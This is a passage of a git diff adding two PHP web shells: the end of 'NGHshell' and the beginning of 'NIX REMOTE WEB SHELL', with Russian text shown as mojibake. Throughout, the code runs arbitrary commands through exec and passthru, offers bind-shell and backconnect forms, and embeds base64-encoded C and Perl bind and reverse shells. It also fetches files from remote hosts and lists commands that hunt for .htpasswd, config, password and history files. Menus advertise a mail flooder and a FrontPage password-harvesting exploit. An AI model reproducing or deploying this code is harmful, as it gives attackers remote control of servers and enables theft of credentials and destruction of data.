+   <td><b>Software:</b></td><td class=v><?=$_SERVER["SERVER_SOFTWARE"]?></td>
+  </tr>
+ </table>
+ <form action=<?=$script?> method=GET>
+ <b>Êîìàíäà:</b> <input type=text name=cmd value="<?=$cmd?>" size=120>
+ <input type=hidden name=dir value="<?=$dir?>"><br>
+ <textarea rows=8 cols=97>
+<?
+if ($cmd) {
+ exec($cmd, $out);
+ echo convert_cyr_string(implode("\r\n", $out), "a", "w");
+}
+?>
+</textarea></form>
+<form action=<?=$script?>?act=bindshell method=POST>
+<b>Bind /bin/bash at port: </b><input type=text name=port size=8>
+<input type=submit value=Bind>
+</form>
+<form action=<?=$script?>?act=backconnect method=POST>
+<b>Connectback:</b> Àäğåññ <input type=text name=addr>
+Ïîğò <input type=text name=port size=8>
+<input type=submit value=Connect>
+</form>
+<?
+if($handle = @opendir($dir)) {
+?>
+ <form action=<?=$script?>?act=mass method=POST>
+ <table width=700>
+ <tr class=e><td colspan=7><b><?=$dir?></b></td></tr>
+ <tr class=h><td><a href="<?=$script?>?dir=<?=$back?>"><<</a></td>
+ <td><small><font color=#D1D1E1>size</font></small></td>
+ <td><small><font color=#D1D1E1>date</font></small></td>
+ <td colspan=4><small><font color=#D1D1E1>permissions</font></small></td></tr>
+<?
+ $cssclass = "v";
+ while ($file = readdir($handle)) {
+  if (is_dir($dir.$file) && $file != ".." && $file != ".") {
+   $inf = pathinfo($dir.$file);
+   echo "<tr class=".$cssclass." onmouseover=\"className='v3'\"  onmouseout=\"className='".$cssclass."'\">\n"
+       ."<td><input type=checkbox name=".$file." value=".$dir.$file.">"
+       ."[<a href=\"".$script."?dir=".rawurlencode($inf['dirname'])."/".rawurlencode($inf['basename'])."\">"
+       .$file."</a>]</td><td><b>--dir</b></td><td>".date("d.m.y/H:i", filemtime($dir.$file))."</td>\n"
+       ."<td>".parseperms(fileperms($dir.$file))."</td>\n"
+       ."<td><a href=\"".$script."?act=rm&name=".rawurlencode($dir.$file)."\">DEL</a></td>\n"
+       ."<td colspan=2><a href=\"".$script."?act=renameform&name=".rawurlencode($dir.$file)."\">MOVE(COPY)</a></td></tr>\n";
+   if ($cssclass == "v") $cssclass = "v2";
+   elseif ($cssclass == "v2") $cssclass = "v";
+  }
+ }
+ rewinddir($handle);
+ while ($file = readdir($handle)) {
+  if (is_file($dir.$file)) {
+   echo "<tr class=".$cssclass." onmouseover=\"className='v3'\"  onmouseout=\"className='".$cssclass."'\">\n"
+       ."<td><input type=checkbox name=".$file." value=".$dir.$file.">"
+       ."[".$file."]</td><td>".filesize($dir.$file)."</td><td>\n"
+       .date("d.m.y/H:i", filemtime($dir.$file))."</td>\n"
+       ."<td>".parseperms(fileperms($dir.$file))."</td>\n"
+       ."<td><a href=\"".$script."?act=rm&name=".rawurlencode($dir.$file)."\">DEL</a></td>\n"
+       ."<td><a href=\"".$script."?act=renameform&name=".rawurlencode($dir.$file)."\">MOVE(COPY)</a></td>\n"
+       ."<td><a href=\"".$script."?act=viev&name=".rawurlencode($dir.$file)."\">EDIT</a></td></tr>\n";
+   if ($cssclass == "v") $cssclass = "v2";
+   elseif ($cssclass == "v2") $cssclass = "v";
+  }
+ }
+ closedir($handle);
+?>
+ </table>
+ <b>Ñ îòìå÷åíûìè:</b> <input type=radio name=mass value=del checked> Óäàëèòü
+ <b>[</b> <input type=radio name=mass value=mv> Ïåğåìåñòèòü
+ <input type=radio name=mass value=cp> Êîïèğîâàòü
+ â <input type=text name=to value="<?=$dir?>"> <b>]</b>
+ <br><input type=submit value=Âûïîëíèòü>
+ </form>
+ <form action=<?=$script?>?act=mkdir method=POST>
+ <b>Ñîçäàòü ïàïêó</b><br>
+ <input type=text name=dirname size=40>
+ <input type=hidden name=dir value="<?=$dir?>">
+ <input type=submit value=Ñîçäàòü></form>
+ <FORM ENCTYPE=multipart/form-data ACTION=<?=$script?>?act=touch METHOD=POST>
+ <b>Ñîçäàòü ïóñòîé ôàéë</b><br>
+ <INPUT type=text NAME=file size=40>
+ <input type=hidden name=dir value="<?=$dir?>">
+ <INPUT TYPE=submit VALUE=Ñîçäàòü></FORM>
+ <FORM ENCTYPE=multipart/form-data ACTION=<?=$script?>?act=upload METHOD=POST>
+ <b>Çàêà÷àòü ôàéë</b><br>
+ <INPUT NAME=userfile TYPE=file size=40>
+ <input type=hidden name=uploaddir value="<?=$dir?>">
+ <INPUT TYPE=submit VALUE=Îòïğàâèòü></FORM>
+ <a href=<?=$script?>?act=phpinfo>Phpinfo()</a>
+<?
+} else die("<font color=#DF0000>Äèğåêòîğèÿ íå íàéäåíà</font>\n");
+function rm($name) {
+ if (is_file($name)) {
+  if (!@unlink($name)) die("<font color=#DF0000>Íåìîãó óäàëèòü ôàéë <b>".$name."</b></font>\n");
+ }
+ elseif (is_dir($name)) deldir($name);
+}
+function mvcp($from, $to, $todo) {
+ if ($todo == "mv") {
+  if (is_file($from)) {
+   if (!rename($from, $to)) {
+    die("<font color=#DF0000>Îøèáêà ïğè ïåğåìåùåíèè ôàéëà ".$from."</font>");
+   }
+  }
+  elseif (is_dir($from)) {
+   mvdir($from, $to, $todo);
+  }
+ } else {
+  if (is_file($from)) {
+   if (!copy($from, $to)) {
+    die("<font color=#DF0000>Îøèáêà ïğè êîïèğîâàíèè ôàéëà ".$from."</font>");
+   }
+  }
+  elseif (is_dir($from)) {
+   mvdir($from, $to, "cp");
+  }
+ }
+}
+function deldir($name) {
+ if (@$handle=opendir($name)) {
+  while ($file = readdir($handle)) {
+   if ($file != ".." && $file != ".") {
+    if (is_file($name."/".$file)) {
+     unlink($name."/".$file);
+    }
+    elseif (is_dir($name."/".$file)) {
+     deldir($name."/".$file);
+    }
+   }
+  }
+  closedir($handle);
+ } else die("<font color=#DF0000>Íåìîãó óäàëèòü ïàïêó <b>".$name."</b></font>\n");
+ rmdir($name);
+}
+function mvdir($from, $to, $todo) {
+ if (@$handle = opendir($from)) {
+  mkdir($to);
+  while ($file = readdir($handle)) {
+   if ($file != ".." && $file != ".") {
+    if (is_file($from."/".$file)) {
+     if (!copy($from."/".$file, $to."/".$file)) {
+      die("<font color=#DF0000>Îøèáêà ïğè êîïèğîâàíèè ôàéëà ".$from."/".$file."</font>");
+     }
+    }
+    elseif (is_dir($from."/".$file)) {
+     mvdir($from."/".$file, $to."/".$file, $todo);
+    }
+   }
+  }
+  closedir($handle);
+  if ($todo == "mv") deldir($from);
+ } else die("<font color=#DF0000>Íåìîãó êîïèğîâàòü ïàïêó <b>".$name."</b></font>\n");
+}
+function parseperms($perms)
+{
+ if (!$perms) return "null";
+ if (($perms & 0xC000) == 0xC000) {
+    $info = 'socket ';
+ } elseif (($perms & 0xA000) == 0xA000) {
+    $info = 'link ';
+ } elseif (($perms & 0x8000) == 0x8000) {
+    $info = '-';
+ } elseif (($perms & 0x6000) == 0x6000) {
+    $info = 'b';
+ } elseif (($perms & 0x4000) == 0x4000) {
+    $info = 'dir ' ;
+ } elseif (($perms & 0x2000) == 0x2000) {
+    $info = 'c';
+ } elseif (($perms & 0x1000) == 0x1000) {
+    $info = 'p';
+ } else {
+    $info = 'u';
+ }
+ $info .= (($perms & 0x0100) ? 'r' : '-');
+ $info .= (($perms & 0x0080) ? 'w' : '-');
+ $info .= (($perms & 0x0040) ?
+            (($perms & 0x0800) ? 's' : 'x' ) :
+            (($perms & 0x0800) ? 'S' : '-'));
+ $info .= (($perms & 0x0020) ? 'r' : '-');
+ $info .= (($perms & 0x0010) ? 'w' : '-');
+ $info .= (($perms & 0x0008) ?
+            (($perms & 0x0400) ? 's' : 'x' ) :
+            (($perms & 0x0400) ? 'S' : '-'));
+ $info .= (($perms & 0x0004) ? 'r' : '-');
+ $info .= (($perms & 0x0002) ? 'w' : '-');
+ $info .= (($perms & 0x0001) ?
+            (($perms & 0x0200) ? 't' : 'x' ) :
+            (($perms & 0x0200) ? 'T' : '-'));
+ return $info;
+}
+echo "<br><small>NGHshell 0.3.9 by Cr4sh</body></html>\n";
+
+/* EOF **********************************/
+?>
diff --git a/php/NIX REMOTE WEB SHELL.php b/php/NIX REMOTE WEB SHELL.php
new file mode 100644
index 0000000..ca60969
--- /dev/null
+++ b/php/NIX REMOTE WEB SHELL.php	
@@ -0,0 +1,1772 @@
+<?php
+#########################################################
+#                 NIX REMOTE WEB SHELL                  #
+#       Coded by DreAmeRz          Ver 1.0              # 
+#      ORIGINAL E-MAIL IS: dreamerz@mail.ru             #
+#                               
+#########################################################
+$name="1";	// ëîãèí ïîëüçîâàòåëÿ
+$pass="1";	// ïàğîëü ïîëüçîâàòåëÿ
+if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)
+   {
+   header("WWW-Authenticate: Basic realm=\"AdminAccess\"");
+   header("HTTP/1.0 401 Unauthorized");
+   exit("Access Denied");
+   }
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head>
+<title>NIX REMOTE WEB-SHELL v.1.0</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+<meta http-equiv="pragma" content="no-cache">
+<meta http-equiv="Content-Language" content="en,ru"> 
+<META name="autor" content="DreAmeRz (www.Ru24-Team.NET)">
+<style type="text/css">
+BODY, TD, TR {
+text-decoration: none;
+font-family: Verdana;
+font-size: 8pt;
+scrollbar-face-color: #FFFFFF;
+scrollbar-shadow-color:#000000 ;
+scrollbar-highlight-color:#FFFFFF;
+scrollbar-3dlight-color: #000000;
+scrollbar-darkshadow-color:#FFFFFF ;
+scrollbar-track-color: #FFFFFF;
+scrollbar-arrow-color: #000000;
+}
+input, textarea, select {
+font-family: Verdana;
+font-size: 10px;
+color: black;
+background-color: red;
+border: solid 1px;
+border-color: black
+}
+UNKNOWN {
+COLOR: black;
+TEXT-DECORATION: none
+}
+A:link {COLOR:black; TEXT-DECORATION: none}
+A:visited { COLOR:black; TEXT-DECORATION: none}
+A:active {COLOR:black; TEXT-DECORATION: none}
+A:hover {color:blue;TEXT-DECORATION: none}
+</STYLE>
+</HEAD>
+
+
+<BODY bgcolor="#fffcf9" text="#000000">
+<P align=center>[ <A href="javascript:history.next(+1)">Âïåğåä ] </A><B><FONT color=#cccccc size=4>*.NIX REMOTE WEB-SHELL</FONT></B>
+v.1.0<FONT color=#linux size=1> Stable </FONT> [ <A href="javascript:history.back(-1)">Íàçàä ]</A>[ <A href="?ac=about" title='×òî óìååò ñêğèïò...'>Î ñêğèïòå ]</a><BR>
+<A href="?ac=info" title='Óçíàé âñå îá ıòîé ñèñòåìå!'>[ Èíôîğìàöèÿ î ñèñòåìå</A> ][ <A href="?ac=navigation" title='Óäîáíàÿ ãğàôè÷åñêàÿ íàâèãàöèÿ. Ïğîñìîòğ, ğåäàêòèğîâàíèå...'>Íàâèãàöèÿ</A> ][ <A href="?ac=backconnect" title='Óñòàíîâêà backconnect è îáû÷íîãî áåêäîğà '>Óñòàíîâêà
+áåêäîğà</A> ][ <A href="?ac=eval" title='Ñîçäàé ñâîé ñêğèïò íà php ïğÿìî çäåñü :)'>PHP-êîä</A> ][ <A href="?ac=upload" title='Çàãğóçêà îäíîãî ôàéëà, ìàñcîâàÿ çàãğóçêà, çàãğóçêà ôàéëîâ ñ óäàëåííîãî êîìïüşòåğà!'>Çàãğóçêà ôàéëîâ</A> ][ <A href="?ac=shell" title='bash shell, àëüÿñû...'>Èñïîëíåíèå
+êîìàíä ]</A> <br><A href="?ac=sql" title='Ğàáîòà ñ MySQL'> [ MySQL</A> ]<A href="?ac=sendmail" title='Îòïğàâü å-mail îòñşäà!'>[ Îòïğàâêà ïèñüìà</A> ][ <A href="?ac=mailfluder" title='Òåáÿ êòî-òî äîñòàë? Òîãäà òåáå ñşäà...'>Ìàèëôëóäåğ</A>
+ ][ <A href="?ac=tools" title='Êîäèğîâùèêè/äåêîäèğîâùèêè md5, des, sha1, base64... '>Èíñòğóìåíòû ]</A>[ <A href="?ac=ps" title='Îòîáğàæàåò ñïèñîê ïğîöåññîâ íà ñåğâåğå è ïîçâîëÿåò èõ óáèâàòü!'>Äåìîíû</A> ][ <A href="?ac=art" title='Àëüòåğíàòèâíûå ìåòîäû âçëîìà...'>Àëüòåğíàòèâíûå ìåòîäû</A> ][ <A href="?ac=exploits" title='id=root gid=0 uid=0'>/root</A> ][ <A href="?ac=selfremover" title='Íàäîåë ıòîò ñåğâåğ? Òîãäà ìîæíî óäàëèòü è øåëë...'>Óäàëèòü øåëë</A> ]</P>
+<?php
+if (ini_get('register_globals') != '1') {
+
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+Error_Reporting(E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR);
+set_magic_quotes_runtime(0);
+set_time_limit(0);		// óáğàòü îãğàíè÷åíèå ïî âğåìåíè
+ignore_user_abort(1);	// èãíîğèğîâàòü ğàçğûâ ñâÿçè ñ áğàóçåğîì
+error_reporting(0);
+$self = $_SERVER['PHP_SELF'];
+$docr = $_SERVER['DOCUMENT_ROOT'];
+$sern = $_SERVER['SERVER_NAME'];
+if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
+$aliases=array(
+'------------------------------------------------------------------------------------' => 'ls -la;pwd;uname -a',
+'ïîèñê íà ñåğâåğå âñåõ ôàéëîâ ñî suid-áèòîì' => 'find / -type f -perm -04000 -ls',
+'ïîèñê íà ñåğâåğå âñåõ ôàéëîâ ñî sgid-áèòîì' => 'find / -type f -perm -02000 -ls',
+'ïîèñê â òåêóùåé äèğåêòîğèè âñåõ ôàéëîâ ñî sgid-áèòîì' => 'find . -type f -perm -02000 -ls',
+'ïîèñê íà ñåğâåğå ôàéëîâ config' => 'find / -type f -name "config*"',
+'ïîèñê íà ñåğâåğå ôàéëîâ admin' => 'find / -type f -name "admin*"',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ config' => 'find . -type f -name "config*"',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ pass' => 'find . -type f -name "pass*"',
+'ïîèñê íà ñåğâåğå âñåõ äèğåêòîğèé è ôàéëîâ, îòêğûòûõ äëÿ çàïèñè' => 'find / -perm -2 -ls',
+'ïîèñê â òåêóùåé äèğåêòîğèè âñåõ äèğåêòîğèé è ôàéëîâ, îòêğûòûõ äëÿ çàïèñè' => 'find . -perm -2 -ls',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ service.pwd' => 'find . -type f -name service.pwd',
+'ïîèñê íà ñåğâåğå ôàéëîâ service.pwd' => 'find / -type f -name service.pwd',
+'ïîèñê íà ñåğâåğå ôàéëîâ .htpasswd' => 'find / -type f -name .htpasswd',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .htpasswd' => 'find . -type f -name .htpasswd',
+'ïîèñê âñåõ ôàéëîâ .bash_history' => 'find / -type f -name .bash_history',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .bash_history' => 'find . -type f -name .bash_history',
+'ïîèñê âñåõ ôàéëîâ .fetchmailrc' => 'find / -type f -name .fetchmailrc',
+'ïîèñê â òåêóùåé äèğåêòîğèè ôàéëîâ .fetchmailrc' => 'find . -type f -name .fetchmailrc',
+'âûâîä ñïèñêà àòğèáóòîâ ôàéëîâ íà ôàéëîâîé ñèñòåìå ext2fs' => 'lsattr -va',
+'ïğîñìîòğ îòêğûòûõ ïîğòîâ' => 'netstat -an | grep -i listen',
+'ïîèñê âñåõ php-ôàéëîâ ñî ñëîâîì password' =>'find / -name *.php | xargs grep -li password',
+'ïîèñê ïàïîê ñ ìîäîì 777' =>'find / -type d -perm 0777',
+'Îïğåäåëåíèå âåğñèè ÎÑ' =>'sysctl -a | grep version',
+'Îïğåäåëåíèå âåğñèè ÿäğà' =>'cat /proc/version',
+'Ïğîñìîòğ syslog.conf' =>'cat /etc/syslog.conf',
+'Ïğîñìîòğ Message of the day' =>'cat /etc/motd',
+'Ïğîñìîòğ hosts' =>'cat /etc/hosts',
+'Âåğñèÿ äèñòğèáóòèâà 1' =>'cat /etc/issue.net',
+'Âåğñèÿ äèñòğèáóòèâà 2' =>'cat /etc/*-realise',
+'Ïîêàçàòü âñå ïğîöåñû' =>'ps auxw',
+'Ïğîöåññû òåêóùåãî ïîëüçîâàòåëÿ' =>'ps ux',
+'Ïîèñê httpd.conf' =>'locate httpd.conf');
+
+
+
+/* Port bind source */
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5
+jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5
+ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5
+0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV
+mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0
+KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh
+hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F
+OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N
+rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F
+kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB
+7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV
+wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ
+6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh
+hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J
+pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN
+sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5
+0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih
+lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0
+9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk
+pDQpyZXR1cm4gMDsNCn0=";
+
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi
+AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2
+NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV
+QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ
+pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH
+JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw
+0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm
+FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW
+YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk
+NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0
+9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9";
+
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ
+HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ
+DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ
+HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L
+CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd
+GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka
+WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO
+iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR
+VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK
+FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0
+KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10
+pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ
+ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l
+uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA
+9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt
+zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB
+QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4
+sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg
+pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1
+zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN
+sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+
+if(isset($uploadphp))
+{
+$socket=fsockopen($iphost,$loadport);					//connect
+fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n");	//request
+while(fgets($socket,31337)!="\r\n" && !feof($socket)) {
+unset($buffer); }
+while(!feof($socket)) $buffer.=fread($socket, 1024);
+$file_size=strlen($buffer);
+$f=fopen($loadnewname,"wb+");
+fwrite($f, $buffer, $file_size);
+echo "Ğàçìåğ çàãğóæåííîãî ôàéëà: $file_size <b><br><br>" ;
+}
+
+if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
+elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
+else {$ac = "navigation";}
+
+
+
+switch($ac) {
+
+// Shell
+case "shell":
+echo "<SCRIPT LANGUAGE='JavaScript'>
+<!--
+function pi(str) {
+	document.command.cmd.value = str;
+	document.command.cmd.focus();
+}
+//-->
+</SCRIPT>";
+
+/* command execute */
+if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; }
+
+if (($_POST['alias']) AND ($_POST['alias']!==""))
+ {
+ foreach ($aliases as $alias_name=>$alias_cmd) {
+                                               if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
+                                               }
+ }
+
+
+echo "<font face=Verdana size=-2>Âûïîëíåííàÿ êîìàíäà: <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
+echo "<b>";
+echo "<div align=center><textarea name=report cols=145 rows=20>";
+echo "".passthru($_POST['cmd'])."";
+echo "</textarea></div>";
+echo "</b>";
+?>
+</td></tr>
+
+<tr><b><div align=center>:: Âûïîëíåíèå êîìàíä íà ñåğâåğå ::</div></b></font></td></tr>
+<tr><td height=23>
+<TR>
+	<CENTER>
+ <TD><A HREF="JavaScript:pi('cd ');" class=fcom>| cd</A> |</TD>
+	<TD><A HREF="JavaScript:pi('cat ');" class=fcom>| cat</A> |</TD>
+	<TD><A HREF="JavaScript:pi('echo ');" class=fcom>echo</A> |</TD>
+	<TD><A HREF="JavaScript:pi('wget ');" class=fcom>wget</A> |</TD>
+	<TD><A HREF="JavaScript:pi('rm ');" class=fcom>rm</A> |</TD>
+	<TD><A HREF="JavaScript:pi('mysqldump ');" class=fcom>mysqldump</A> |</TD>
+	<TD><A HREF="JavaScript:pi('who');" class=fcom>who</A> |</TD>
+	<TD><A HREF="JavaScript:pi('ps -ax');" class=fcom>ps -ax</A> |</TD>
+  <TD><A HREF="JavaScript:pi('cp ');" class=fcom>cp</A> |</TD>
+  <TD><A HREF="JavaScript:pi('pwd');" class=fcom>pwd</A> |</TD>
+ <TD><A HREF="JavaScript:pi('perl  ');" class=fcom>perl</A> |</TD>
+ <TD><A HREF="JavaScript:pi('gcc ');" class=fcom>gcc</A> |</TD>
+ <TD><A HREF="JavaScript:pi('locate ');" class=fcom>locate</A> |</TD>
+  <TD><A HREF="JavaScript:pi('find ');" class=fcom>find</A> |</TD>
+  <TD><A HREF="JavaScript:pi('ls -lad');" class=fcom>ls -lad</A> |</TD>
+       </CENTER>           	
+</TR>
+
+<?
+/* command execute form */
+echo "<form name=command method=post>";
+
+echo "<b>Âûïîëíèòü êîìàíäó</b>";
+echo "<input type=text name=cmd size=85><br>";
+echo "<b>Ğàáî÷àÿ äèğåêòîğèÿ &nbsp;</b>";
+if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
+else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
+echo "<input type=submit name=submit value=Âûïîëíèòü>";
+
+echo "</form>";
+
+/* aliases form */
+echo "<form name=aliases method=POST>";
+echo "<font face=Verdana size=-2>";
+echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Âûáåğèòå àëèàñ<font face=Wingdings color=gray></font>&nbsp;&nbsp;&nbsp;&nbsp;</b>";
+echo "<select name=alias>";
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ echo "<option>$alias_name</option>";
+ }
+ echo "</select>";
+if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
+else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
+echo "&nbsp;&nbsp;<input type=submit name=submit value=Âûïîëíèòü>";
+echo "</font>";
+echo "</form>";
+
+
+break;
+case "art":
+echo "<a href='?ac=frontpage'><b>FrontPage Exploit by Nitrex</b></a><br>
+İêñïëîéò äëÿ FrontPage. Ñîáèğàåò ÷èòàåìûå .htpassword ôàéëû ïî âñåìó ñåğâåğó. Ïîçâîëÿåò ñîçäàòü íåõèëóş áàçó âñåõ ñàéòîâ â âèäå ëîãèí:ïàğîëü îò õîñòåğà, òî åñòü ïàğîëè ê FrontPage ïîäõîäÿò ê FTP è äğóãèì ñåğâèñàì ñåğâåğà. Ğàññøèôğîâêà ïğîèçâîäèòñÿ ñ ïîìîùüş John The Ripper (Standart/DES).<br><br>
+<a href='?ac=dbexploit'><b>MySQL Find Config Exploit by DreAmeRz</b></a><br>
